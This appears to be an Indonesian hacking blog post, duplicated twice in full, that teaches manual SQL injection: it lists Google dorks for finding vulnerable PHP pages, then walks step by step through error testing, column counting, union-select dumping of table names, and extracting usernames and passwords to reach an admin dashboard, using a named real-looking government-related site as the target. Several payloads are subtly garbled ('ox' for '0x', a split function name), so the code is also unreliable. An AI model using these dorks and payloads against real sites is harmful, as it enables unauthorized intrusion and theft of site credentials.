Hai sob,jumpa lagi ma aye kali ini kita coba bahas sql manual sob,ok lah kita langsung aja ea:)
Dork:
inurl:index.php?id=
inurl:trainers.php?id
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:curriculum.php?id=
inurl:iniziativa.php?in=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php.id=
Dorkinglah di google dengan dork dork tadi sob,misalnya kita nemu web targetnya
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431
Kita cara cek vuln sql atau tidak kita tinggal tambahin(')diujung link jadi seperti ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431'
Ntar kalo blank atau muncul tulisan you have an error in your sql syntax berarti vuln.Trus kalo dah nemu web vulnnya kita dump pake perintah
+order+by+--+--
Taruh dibelakang link jadi gini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+1--+--
Jika gak blank/eror berarti d tambahin 1 ampe nemu error/blanknya misal web ini nemu error diangka 28
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+28--+--
Berarti disini jumlah tabel pada data basenya ada 27
Nah kalo udah ketemu jumlah tabelnya kita dump dengan perintah
+union+select(jumlah tabel)-- tapi sebelum angka kasih tanda(-) tanpa tanda kurung.jadi linknya seperti ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8+9+10+11+12+13+14+15+16+17+18+19+20+21+22+23+24+25+26+27--
Nah kalau udah pasti keluar angka keramatnya.Disini yang keluar adalah angka 9 jadi tabel itulah yang sekiranya dimasukan perintah selanjutnya.Dengan syarat angka 9 tadi dihapus dengan perintah selanjutnya adalah
(select+export_set(5,@;=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,ox3c6c693e,2),column_name,oxa3a,2))@,2))
Maka linknya menjadi
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8,select+expor t_set(5,@;=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,ox3c6c693e,2),column_name,oxa3a,2))@,2)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Kalo dah nemu nama nama tabelnya,nah disini kita cari yang berhubungan dengan username dan pasword,maka kita cari user dan pasword dengan perintah:
(select(@x)from(select(@x:=oxoo),(select(@x)from(nama tabel)where(@x)in(@x:=concat(ox20,@x,ox3c62723e,yang mau dicari,ox203a3a20,yang mau dicari))))x)
Berhubung yang kita cari username dan pasword maka kita buat perintah like this
(select(@x)from(select(@x:=oxoo),(select(@x)from(user)where(@x)in(ox:=concat(ox20,@x,ox3c62723e,username,ox203a3a20,pasword))))x)
Maka di link kita tulis menjadi
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8,(select(@x)from(select(@x:=oxoo),(select(@x)from(user)where(@x)in(@x:=concat(ox20,@x,ox3c62723e,username,ox203a3a20,pasword))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Nantu muncul username dan pasword webnya tinggal cari admin loginnya.Jika sudah benar ntar langsung menuju dashboard admin webnya,ok cukup segitu aja ea sob,jika ada yang kurang aye mohon maaf ea
Dork:
inurl:index.php?id=
inurl:trainers.php?id
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:curriculum.php?id=
inurl:iniziativa.php?in=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php.id=
Dorkinglah di google dengan dork dork tadi sob,misalnya kita nemu web targetnya
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431
Kita cara cek vuln sql atau tidak kita tinggal tambahin(')diujung link jadi seperti ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431'
Ntar kalo blank atau muncul tulisan you have an error in your sql syntax berarti vuln.Trus kalo dah nemu web vulnnya kita dump pake perintah
+order+by+--+--
Taruh dibelakang link jadi gini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+1--+--
Jika gak blank/eror berarti d tambahin 1 ampe nemu error/blanknya misal web ini nemu error diangka 28
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+28--+--
Berarti disini jumlah tabel pada data basenya ada 27
Nah kalo udah ketemu jumlah tabelnya kita dump dengan perintah
+union+select(jumlah tabel)-- tapi sebelum angka kasih tanda(-) tanpa tanda kurung.jadi linknya seperti ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8+9+10+11+12+13+14+15+16+17+18+19+20+21+22+23+24+25+26+27--
Nah kalau udah pasti keluar angka keramatnya.Disini yang keluar adalah angka 9 jadi tabel itulah yang sekiranya dimasukan perintah selanjutnya.Dengan syarat angka 9 tadi dihapus dengan perintah selanjutnya adalah
(select+export_set(5,@;=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,ox3c6c693e,2),column_name,oxa3a,2))@,2))
Maka linknya menjadi
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8,select+expor t_set(5,@;=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,ox3c6c693e,2),column_name,oxa3a,2))@,2)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Kalo dah nemu nama nama tabelnya,nah disini kita cari yang berhubungan dengan username dan pasword,maka kita cari user dan pasword dengan perintah:
(select(@x)from(select(@x:=oxoo),(select(@x)from(nama tabel)where(@x)in(@x:=concat(ox20,@x,ox3c62723e,yang mau dicari,ox203a3a20,yang mau dicari))))x)
Berhubung yang kita cari username dan pasword maka kita buat perintah like this
(select(@x)from(select(@x:=oxoo),(select(@x)from(user)where(@x)in(ox:=concat(ox20,@x,ox3c62723e,username,ox203a3a20,pasword))))x)
Maka di link kita tulis menjadi
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8,(select(@x)from(select(@x:=oxoo),(select(@x)from(user)where(@x)in(@x:=concat(ox20,@x,ox3c62723e,username,ox203a3a20,pasword))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Nantu muncul username dan pasword webnya tinggal cari admin loginnya.Jika sudah benar ntar langsung menuju dashboard admin webnya,ok cukup segitu aja ea sob,jika ada yang kurang aye mohon maaf ea
Comments
Post a Comment